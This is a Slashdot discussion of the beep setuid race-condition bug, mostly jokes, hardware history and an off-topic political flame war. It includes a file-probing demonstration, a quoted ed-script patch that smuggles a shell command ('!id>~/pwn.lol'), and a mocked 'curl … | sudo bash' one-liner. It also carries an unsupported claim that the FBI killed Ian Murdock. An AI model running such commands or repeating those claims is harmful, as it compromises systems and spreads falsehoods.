Linux: Beep Command Can Be Used to Probe for the Presence of Sensitive Files

Catalin Cimpanu, writing for BleepingComputer: A vulnerability in the "beep" package that comes pre-installed with Debian and Ubuntu distros allows an attacker to probe for the presence of files on a computer, even those owned by root users, which are supposed to be secret and inaccessible. The vulnerability, tracked as CVE-2018-0492, has been fixed in recent versions of Debian and Ubuntu (Debian-based OS). At its core, the bug is a race condition in the beep utility that allows the OS to emit a "beep" sound whenever it is deemed necessary. Security researchers have discovered a race condition in the beep package that allows an attacker to elevate his code to root-level access.

bleep

[Chaldean42]

Anyone else find it ironic that this comes from bleepingcomputer.com?

Re:bleep

No. Not if you consider the actual definition of ironic, instead of that Canadian chick's false definition.

Re:bleep

[fluffernutter]

From your comment I expected to see a link to a definition that differed from Alanis Morissette's but it is the same; leaving me very confused.

Re: bleep

[aliquis]

The second one there seem to fit ...

Re:bleep

A more authoritative source.

Re:bleep

If Hillary had committed any crimes, dontchathink that the Republican lead Congress would have found her guilty of something and actually done something about it?

Is someone a criminal really because a bunch of crazies keep making shit up about them?

Re: bleep

Look at definition 3 in your own link.

Re:bleep

If Hillary had committed any crimes, dontchathink that the Republican lead Congress would have found her guilty of something and actually done something about it?

Is someone a criminal really because a bunch of crazies keep making shit up about them?

[M]aking shit up?!?!?!

What color is the sky on your planet?

<HILLARY>There is no email server</HILLARY>

Cash Flowed to Clinton Foundation Amid Russian Uranium Deal - The New York Times

Re:bleep

[Archangel+Michael]

Dude, Hillary lost.

Not according to Hillary and the left, who keep reminding those of us who didn't vote for her that she "won the popular vote", as if that is some sort of consolation prize.

Re:bleep

The popular vote is the popular vote = more people voted for HRC than Donald J Prison. Face it however you can. Trump for his part can't admit that fact, goes so far as to lie about photographs on the topic.
Isn't it sad when a Billionaire con man goes to prison because he couldn't stop lying? That's Republicanism today I guess - eventually the truth sets them free, but life in prison is such a looooooong time...

Treason doesn't pay. Learn that lesson, you've got plenty of time. You may get there eventually. (Also, I voted for Bernie knowing he would lose, he's the trustworthy one of the three.)

Re:bleep

Congress makes laws, they don't enforce them, nor do they investigate them -- that would be the judicial branch, and the FBI both of which are overwhelmingly not republican.

Re:bleep

[null+etc.]

This is the age of unsubstantiated bullshit. Indirect accusations are now more powerful than fact.

Re:bleep

The long answer to your question is at the bottom of the page at this link. https://linux.die.net/man/1/beep

TL;DR answer: A non-root remote user cannot use beep, and an xterm or other x-session is considered to be "remote".

Re:bleep

[Obfuscant]

as if that is some sort of actual thing

FTFY. There ain't no "popular vote" for President in the US.

Re:bleep

I consider it ironic that the Presiding officer of the United States is about to become the most carefully guarded criminal in that nation's storied history...

yet again a guilty american voter feel the need to dillute a discussion about something to pander his/hers bad conscience.

Re:bleep

[bugs2squash]

I'd be interested to see what facts you have to back those statements up, especially the one about the FBI.

Re: bleep

[Brockmire]

You just proved his point. Find the John Oliver take down on why your Russian/Uranium deal proves you're a tinfoil fucknut. It wasn't even up to her. How the fuck can Putin both loathe Hillary and love her at the same time? Jesus fucking Christ you're fucking dumb. It's well known he hates her. Get some better conspiracies that don't immediately fall apart.

Re: bleep

[Brockmire]

Google search disagrees.

Re: bleep

[Brockmire]

I see you're getting on the Trump train if you think changing facts makes any sense. Not repeating it doesn't make it untrue.

Re:bleep

[Archangel+Michael]

Treason doesn't pay.

Unless you're Hillary. The whole Clinton Foundation thing while SoS was a criminal endeavor pay to play, legalized bribery. Funny how the Clinton Foundation donations have all but disappeared now that she and Bill have no chance at power.

And no, I didn't vote for Donald. It is amazing how people are still excusing their candidate because someone else won. Two Criminals, by Two Criminal Organization called political parties. Pretending it would be better under "Not Trump" Hillary is why the country is going to shit.

And Bernie isn't trustworthy, he and his wife are under criminal investigation for fraud. But he's a good socialist so lets ignore that.

Re: bleep

Congress writes laws. It does not enforce them. Search for "Schoolhouse Rock" on YouTube for higher education on civics too advanced for most public high schools.

Re: bleep

The USA has never elected Presidents on the basis of the popular vote. If we did, then Abe Lincoln never would have been President and blacks might still today be the slaves of wealthy Democrats.

Re:bleep

[JustNiz]

>> Republican lead Congress

Like this you mean? :https://www.politico.com/story/2017/11/13/sessions-special-counsel-clinton-uranium-244867

Re: bleep

[JustNiz]

By your standards, the Attorney general must be a tinfoil fucknut too then.
https://www.politico.com/story...

> Jesus fucking Christ you're fucking dumb. It's well known he hates her.
Its also well-known that he hates Trump and in fact anything American, but you Liberal morons just can't handle that because the truth undermines your whole rabid conspiracy rant.

Re:bleep

[JustNiz]

It is perfectly well documented that Hillary has in fact broken the law and has thus far at least, gotten away scott free with it.

If someone simply pointing out facts equates in your mind to that person having personal failings and insecurities, then it's 100% clear that you only need to look in the mirror to see where the real and significant mental issues actually lie.

beep boop root

Urg... this'll get some flack from the Windows fanboys.

"Linux can be rooted by a command that makes your computer beep? That's fucking idiotic, man..."

Re:beep boop root

[Sarten-X]

Right? About the only thing worse would be a kernel vulnerability in something silly like fonts...

The beep vulnerability makes a lot of sense, actually. Related to this update, I recently learned that the ubiquitous beep used to be driven by reprogramming the system clock. Naturally, that kind of hardware access is something that should be a system administrator function, restricted to root on *nix systems. It would make sense, then, that any vulnerability there would likely be a privilege escalation.

Re:beep boop root

[TheRaven64]

Right? About the only thing worse would be a kernel vulnerability in something silly like fonts

Windows and Linux have both had font handling vulnerabilities. The difference is that in Windows they were in the kernel, whereas in Linux they were in X11, which ran with root privilege and could open /dev/kmem and directly modify kernel memory.

The beep vulnerability makes a lot of sense, actually.

No it doesn't. All *NIX operating systems provide standard UNIX file permissions on device nodes and accessing /dev/dsp or the device for the internal speaker to a group is trivial. Most modern *NIX systems provide ACLs, so you can provide finer-grained access. Most modern *NIX systems even provide access control frameworks that let you grant access on a {program, file} pair, rather than, a {user, file} pair, so you could grant access to the device to the beep program running at any user, but not grant any other rights to the program or the user. These vulnerabilities are in no way intrinsic to the beep program, they are related to how the beep program is installed.

Re:beep boop root

[tlhIngan]

Right? About the only thing worse would be a kernel vulnerability in something silly like fonts...

The beep vulnerability makes a lot of sense, actually. Related to this update, I recently learned that the ubiquitous beep used to be driven by reprogramming the system clock. Naturally, that kind of hardware access is something that should be a system administrator function, restricted to root on *nix systems. It would make sense, then, that any vulnerability there would likely be a privilege escalation.

Font handling is not easy, especially in modern days. It might seem easy (after all, TeX works by pushing around fixed-sized boxes, but that doesn't work in a modern i18n world). Take for example, letter decorations. Beyond the Euro languages which generally just have accents and such, some languages have a lot more they can put on letters. And then the order of the decorations can be important as well as where the character appears in the string (e.g., Arabic is bad for this - add a character and the "word" can enlarge in size, shrink in size, etc. It's one of the ways iOS was compromised - if you attempt to replace a long word with a split one (e.g., instead of showing "This is a really long message to fit on the message box of the screen", it will want to cut it and show "This is a really long message..." or "This is a really long mess..."), the string can actually take more space to display than if you added more characters.

Rendering fonts is no longer easy - some languages seem poised to make it especially difficult because the shape you use depends on so many variables (decorations, preceding words, location of character in the word, etc) so it is no surprise that there are vulnerabilities. Depending on where your font rendering code is, this could be a serious one or a minor one.

As for the beep package, on the PC, the system speaker is connected to the timer chip. In order to control the pitch and duration you have to reprogram the timer chip (which can be the main timer chip as well) in order to cause it to make noise (you have to have access to a couple other registers as well - there's an enable line and an "amplifier" enable line used to connect the timer output to the speaker itself).

This inflexibility of the PC speaker is what makes PCM output using the speaker impressive.

Re:beep boop root

[Sarten-X]

Both points there are exactly what I was alluding to... Modern computing is a lot more complicated than it seems. It's amazing how much of technology is hacked together with duct tape and baling wire to make it work, and it's silly for anyone to throw stones in a city full of glass houses.

Re:beep boop root

I don't use duct tape to keep things stuck together. I jerk off into my hand and spread it as an adhesive.

Article ist not correct

[messju]

Beep is not pre-installed on Debian GNU/Linux.

Re:Article ist not correct

[andrewbaldwin]

It's not pre - installed on Mint either

Re:Article ist not correct

[sjwest]

Its not debian installed by default

beep does what you'd expect: it beeps. But unlike printf "\a" beep allows
you to control pitch, duration, and repetitions. Its job is to live inside
shell/perl scripts and allow more granularity than one has otherwise. It is
controlled completely through command

I suppose somebody needs that, not us.

Re:Article ist not correct

If you have never written a script to generate music using beep you don't belong on slashdot.

Re:Article ist not correct

[FormOfActionBanana]

When I was young the programs were play and rec.

Re:Article ist not correct

[FormOfActionBanana]

Or fucking echo Ctrl-V Ctrl-A

Re:Article ist not correct

[Scarletdown]

So only those who have ever used computers just to generate music are supposed to be on Slashdot? You might want to go back to eating Tide Pods and snorting condoms back in your basement, kid.

Re:Article ist not correct

[Chris+Mattern]

Nor on Ubuntu. I can't imagine anybody going out and just getting this package. Is there anything that gets it as a pre-req?

Re:Article ist not correct

[Carewolf]

If you have never written a script to generate music using beep you don't belong on slashdot.

Coding music with beep is like programming BASIC, real men echo to /dev/dsp.

Re:Article ist not correct

[tomxor]

Yup, I just tried it.

Re:Article ist not correct

[KiloByte]

real men echo to /dev/dsp

Except for those who noticed that /dev/dsp was deprecated five ages and two aeons ago, and today its emulation is not even functional anymore.

Re:Article ist not correct

And in most systems the beep command needs extra privileges to run:

ac@slashdot ~ $ beep
ioctl: Operation not permitted

Re:Article ist not correct

Or fucking echo Ctrl-V Ctrl-A

-bash: fucking: command not found

Re: Article ist not correct

alias fucking sudo

Re:Article ist not correct

[Carewolf]

real men echo to /dev/dsp

Except for those who noticed that /dev/dsp was deprecated five ages and two aeons ago, and today its emulation is not even functional anymore.

You could say the same about beep, deprecated and now only works through emulation.. Emulation so complex it has security holes.

Re:Article ist not correct

[KiloByte]

That's not emulation of beeps: you can do that unprivileged as long as you can play regular sound: here's a function named sin, output its results as 16-bit integers and there you go. That beep tool uses real PC honker, needing root to access it without being at console.

setuid strikes again

*sigh* Either remove the damn thing from your program and require sudo privs, or redesign the thing so it doesn't need root (if possible).

Re:setuid strikes again

*sigh* Either remove the damn thing from your program and require sudo privs, or redesign the thing so it doesn't need root (if possible).

What the flying fuck do you need to be setuid in order to make a beep sound?

Did beep catch the systemd disease?

Re:setuid strikes again

Please don't give Poettering anymore ideas, beepd does not need to happen.

Re: setuid strikes again

[guruevi]

Beeping on IBM clones is done by playing with the PIC chip which was quite literally connected to a pin on the processor. It requires rather low level access to program. You could obviously write a shim in modern kernels to user space but there are a lot of things that have direct access to hardware.

Re:setuid strikes again

The program needs to open the system console, that is /dev/tty0 to be able to use the ioctl required to send the beep, assuming you're not on the local console. The flaw in the program is that it allows you to specify a path for the console, which allows you to see if a file exists(like say in /root or whatever). Basically the program tries to open specified file and then reports failure if the file doesn't exist. If the file does exist, the ioctl() will error out.

$ /usr/local/bin/beep -e /root/.bashrc
ioctl: Inappropriate ioctl for device
ioctl: Inappropriate ioctl for device
$ /usr/local/bin/beep -e /root/failboat
Could not open /root/failboat for writing
open: No such file or directory

Unfortunate

Most of her examples tend more toward "unfortunate" than "ironic" but that was too many syllables to flow well in a song.

Re:Unfortunate

[fluffernutter]

She's talking about ironic coincidences.. which both definitions mention.

Issue was resolved by renaming it to sonar.

nothing to see move laong

So

[Greyfox]

Another setuid vulnerability in this day and age? You'd think it was difficult to find all the setuid programs on a system and audit the shit out of each and every one of them.

Socratic irony, dramatic irony, and...

"The third, and debated, use of irony regards what’s called situational irony. Situational irony involves a striking reversal of what is expected or intended: a person sidesteps a pothole to avoid injury and in doing so steps into another pothole and injures themselves. Critics claim the word irony and ironic as they are generally used (as in, 'Isn’t it ironic that you called just as I was planning to call you?') can only apply to situational irony, and uses like the one above are more properly called coincidence."

So there's still some debate on the topic.

Forget this comes from Bleeping Computer

[cloud.pt]

The real pun to this vulnerability is the fact it is a race condition in the "beep" package.

Beep! Beep!

I find it ironic...

[frank_adrian314159]

... that a command that probably started life as putchar('\007'); could morph into some monster needing to spawn threads and have race conditions.

Re:I find it ironic...

... that a command that probably started life as putchar('\007'); could morph into some monster needing to spawn threads and have race conditions.

If you've heard about this small argument over this systemd thing, you may want to hold off; there are lethal doses of irony there.

Re:I find it ironic...

Your comment tells me that you probably don't understand the "putchar('\007')" reference.

The "bell" command is so primitive that it's a BIOS function. There's no code to write. It's already in there. Even from the DOS 1.0 command line you can type "echo ^G" and it works. (That's the control key plus the letter G, for the younger kids in the crowd)

It should be so simple that regardless of how many layers of code you pile on top, security issues of ANY form should be impossible, But, alas, code bloat and overly complex implementations have brought us to this place. You can't even trust a beep.

Re:I find it ironic...

[edtice1559]

The command is a bit more complicated than that. It allows you to specify the tone and duration. And the race condition comes because (a) multiple processes can call it simultaneously and (b) there is signal handling code present so that the speaker isn't left beeping in perpetuity should the process somehow get killed in the middle of a beep! If you look at the proposed patch, things make a bit more sense. And the FAQ is hysterical https://holeybeep.ninja/

Re:I find it ironic...

Except linux or Windows NT etc. don't use the BIOS?

In Windows, echo ^G plays a .wav file. If sound playback isn't available you can get to hear that DOS 1.0 beep.
So in older versions of Windows, in fail-safe mode you could hear 1980s beeps when using notepad I think (using move keys when the cursor stuck at end or beginning of file). Fairly weird when you didn't except it and hadn't used the PC speaker in a decade.

Perhaps the default .wav files are system protected files these days, but I don't know.
It was discovered that on North Korean linux, there is a system protected .wav file (either edits to the file are reversed, or the computer refuses to work when such files have been tampered with). It's the somewhat famous "screaming pig" stolen from an antivirus program and it's played when there is a "security" issue.

Re:I find it ironic...

Hmm, same AC.
This being Unix, maybe it was the terminal or terminal emulator's job to handle this.
If your terminal or system console was an automated mechanical typewriter, the terminal was just rigged to ring a physical bell when receiving that \007 character?
No BIOS function to write then.
Just don't ring the wrong bells, if there are several terminals attached.

Re:I find it ironic...

The "bell" command is so primitive that it's a BIOS function. There's no code to write. It's already in there. Even from the DOS 1.0 command line you can type "echo ^G" and it works.

Actually it is much older than that. The BEL code was in teletype Murray code from 1901, some 80 years before MS-DOS. It requested that the teletype machine rang a bell to alert the operator.

See http://en.wikipedia.org/wiki/Baudot_code

Re:I find it ironic...

Your comment tells me that you probably don't understand that "putchar('\007')" doesn't permit changing pitch. For that you have to go to IO port 0x61, y'know "OUT 061H, AL" in 8086 assembler, none of this high-level BIOS stuff.

Re:I find it ironic...

I am not going to ask how you know this :P

Re:I find it ironic...

[slashdice]

___________
| oo  .ooo|
| oo  .o o|
| ooo .o  |
|  o  .   |
| oo o.ooo|
| oo  .oo |
| oo  .oo |
|  o  .   |
| oo o.o o|
| oooo.  o|
|  o  .   |
| oo o.o  |
| oo  .  o|
| ooo .ooo|
| oo o.oo |
|  o o.oo |
|    o. o |
___________

Re:I find it ironic...

Some versions of Windows had a Beep() API function. On others, you had to write some assembly language to call the BIOS function. Yes, you could let the command prompt / DOS interpret the bell character, but if you wanted to specify the tone, you had to do more work.

Source: I wrote a DLL that would programmatically call ASM or Beep(), hooked it up to a parser that would interpret a custom music notation, and made it play Chopin.

Captcha: misuse

Re:I find it ironic...

"yeah, the speaker cone just moves by itself when that value is in the stream, you don't need to write any code to make it happen"

Your ignorance, coupled with your arrogance, is stunning. '\007' is the same '\a', which stands for "alarm", and is the ASCII control code BEL. This function goes back to the days of teletypes. The code is in the terminal itself, or later in terminal emulators.

Re:I find it ironic...

It's common knowledge.

Re:I find it ironic...

[AmiMoJo]

Most modern computers don't even have a BIOS any more. In fact most don't even have a beeper.

Some people were using beep to create delays in scripts. The mind boggles.

Debian Beeping

[bill_mcgonigle]

The one thing that's been driving me nuts since switching to Debian testing (from Fedora) is X using system beeps to alert, even though Pulse is running. I'll have to see if something dragged in 'beep' as a dependency when I get home.

Re:Debian Beeping

rmmod pcspkr

FFS

Is this really where we are now? How many decades of computer science and security research and there's a vulnerability in beep?

Pack it up. We're done. Computers were good while they lasted, but maybe our pending cockroach overlords will get this whole computer thing straightened out better than we did.

Missing information

[nospam007]

So, when the attacker do this, does it now beep or not?

Re:Missing information

no they would use beep --silent

Re:Missing information

Beep really beeps silently by default, in fact. May be a debian/ubuntu thing. When you install it and try to use it it doesn't work because some kernel module isn't loaded. After you load the kernel module with the right name that allows to use the PC speaker, it will work if you're lucky. And maybe your PC doesn't have a PC speaker at all.

Re:Missing information

Who the bleep added.....Aweo534ir[asf zs;>>># whoami root #_

If it comes pre-installed, that's a recent change

None of my Ubuntu systems have beep installed and I know I didn't remove it on purpose.

Kids

Kids nowadays couldn't even code a helloworld.c without an error.

Re:Kids

[slashdice]

Kids these days code a helloworld.c using node.js and electron, And yes, it has a cross-domain vulnerability. and 7 copies of Never Gonna Give you Up (apparently, included with is-thirteen.js)

And rooted from the patch, too

[DrYak]

"Linux can be rooted by a command that makes your computer beep? That's fucking idiotic, man..."

And the patch that supposedly fixes the bug contains this gem :

--- /dev/null 2018-13-37 13:37:37.000000000 +0100
+++ b/beep.c 2018-13-37 13:38:38.000000000 +0100
1337a
1,112d
!id>~/pwn.lol;beep # 13-21 12:53:21.000000000 +0100
.

Which is supposed to be an exploit of patch:
according to that source, patch supports diff written in ed scripts (you, know the one editor that is supposed to be the punch line of every "VI vs EMACS" flamewar)
and ed in turn has "! command" to execute commands.

So yes, even the patch fixing the "beep" exploit can be exploited in turn and root the system too (... of any admin careless enough to run the build of the patched package on the bare system instead of inside some container and as a non-root user).

---

Back to beep itself :
- https://sigint.sh/#/holeybeep - a good source which analyzes how beep is exploitable (basically signal handler called at the exact wrong time, while performing a switcharoo on symlink target, between the console that gets opened on each beep, and the target file that gets opened when the signal kills the audio)
- https://github.com/johnath/bee... upstream audio.

Re:And rooted from the patch, too

What I found amazing was how easy this bug was to spot. The procedure do_beep needs console_type to be set appropriately for the device (file) console_fd to work correctly. There is no code to set these two together in an atomic fashion, yet the signal handler just goes ahead and calls do_beep. I don't know much about Linux programming, let alone signal handlers, but even though I didn't immediately see the possibility of an exploit, when I saw the signal handler, I knew instantly a bug was hiding in there.
My best guess to what caused this situation is that beep was considered to be a bit of a hacky bash tool thingly and never given a thorough source review because of that. And before is was setuid'ed there might not have been a point; there's hardly a serious use case for this toy so who cares if it's a bit buggy, right? But then it was setuid'ed without being given the thorough code review any security critical application deserves. I don't know who made that decision, but I'm glad it wasn't yours truly.

Fonts on UNIX

[DrYak]

The difference is that in Windows they were in the kernel, whereas in Linux they were in X11, which ran with root privilege and could open /dev/kmem and directly modify kernel memory.

Maybe a couple of decades ago.

Since then:
- in some distant past, font rendering on Unix was offloaded to a separate X Font Server that communicate over a socket, and didn't need it self to be root to write to the framebuffer.
- in a more recent past , font rendering was moved out of the X server, and into the client.

No it doesn't. All *NIX operating systems provide standard UNIX file permissions on device nodes and accessing /dev/dsp or the device for the internal speaker to a group is trivial.

In this case, that's the console/VT or event device (basically beep is good old "\a" bell, but on steroids, i.e.: with ioctl/writes to precisely tune the beep).
It doesn't use any audio device (no /dev/dsp).

That's indeed stupid as there are methods to give access of those to the currently loged-in user (If I'm not mistaken, basically the same work that has been done to run X11 on any non-dinosaur distros)

That's exactly what is abused by some exploits (source) :
have a symlink point to an event device (the king that is controlled by writing instead of ioctl) start a "beep" command (which will open the symlink for writing as root on each played sound), then at the perfect time reroute the symlink send a kill signal - the signal handle will try to mute the speaker (by again opening the symlink for writing), but is now writing the parameters in the target file instead of the event device.

Safe. Secure. Open Source.

Lol

Oh, nice

[ChoGGi]

Now you can beep your way to success.

bleeping FBI killed bleeping Ian Murdoch.

Just know that Debian is hosed. Ian didn't kill himself he had no reason to. Ask anybody who knew him. He loved his work. Love doesn't make you kill yourself especially if it's your work.

FBI killed Ian because he wouldn't give them beeps into QNAP NAS's etc. Too much snoobability that he wouldn't help circumvent.

Isnt that right slashdot.gov ? Man who are you even trying to bullshit? Everybody is stupid?

Re:bleeping FBI killed bleeping Ian Murdoch.

Ian didn't kill himself he had no reason to. Ask anybody who knew him. He loved his work. Love doesn't make you kill yourself especially if it's your work.

You clearly do not understand what it's like to be suicidal or have ever been so. A lot of people are really good at keeping up a facade that everything is okay and that they are happy and love their work. What you don't see is the turmoil that goes on in their head, what demons they carry and so on. How do I know? Been there, damn near was successful. I tried a massive overdose of benzodiazepines, opioids, paracetamol and pretty much anything else I could find in the house. Absolutely zero people were aware that I was having major mental health issues at the time. Had a great job, loved my work, really had everything going for me, didn't matter.

I understand that its easier for people to try to rationalize that there is no way that someone would commit suicide. Suicidal thoughts aren't rational by their nature.

If only they had used Rust!

[gerald.edward.butler]

Let the games begin!

bigger security hole

Please run this command to find out: curl https://holeybeep.ninja/am_i_vulnerable.sh | sudo bash
If your computer is vulnerable it will beep.

Anyone who would actually run that command has an even bigger security hole between hes ears.

Re: bigger security hole

You misunderstand. Only run this as root so the proper security. e.g file permissions can be locked down by the script as it runs.

Why setuid root??

[schweini]

According to the FAQ, beep has to be installed as setuid root for this to work.
Why the heck would beep need root? I'm guessing in order to access the hardware, but that's what we are supposed to have HALs for?

Beep music

Beep. Ha. You kids today and your conveniences.

My first computer was a TRS-80.

It didn't have a sound generator, but it did have a not very well shielded cassette drive.
You could hand assemble a program and POKE it into memory from BASIC to turn the cassette on and off, which caused interference in the AM range.

Put an AM radio nearby and voilà: music and various sound effects.

Millions "affected"

[paulpach]

From their website:

"How many people are affected?
Millions! Everyone, almost.
According to the Debian popularity contest, beep is installed on 1.86% of all machines. Extrapolating that by the earth population, we estimate roughly 130 million affected users."

130 millions is probably an order of magnitude bigger than all debian users. That extrapolation is ridiculous. Is this supposed to be a tongue in cheek number?

Re:Millions "affected"

Yes, it is supposed to be a tongue-in-cheek number along with a good portion of the rest of that page. Especially the process used to determine the need for a name, a logo, and a web page. Glorious.

Pennywise

Beep beep, Richie!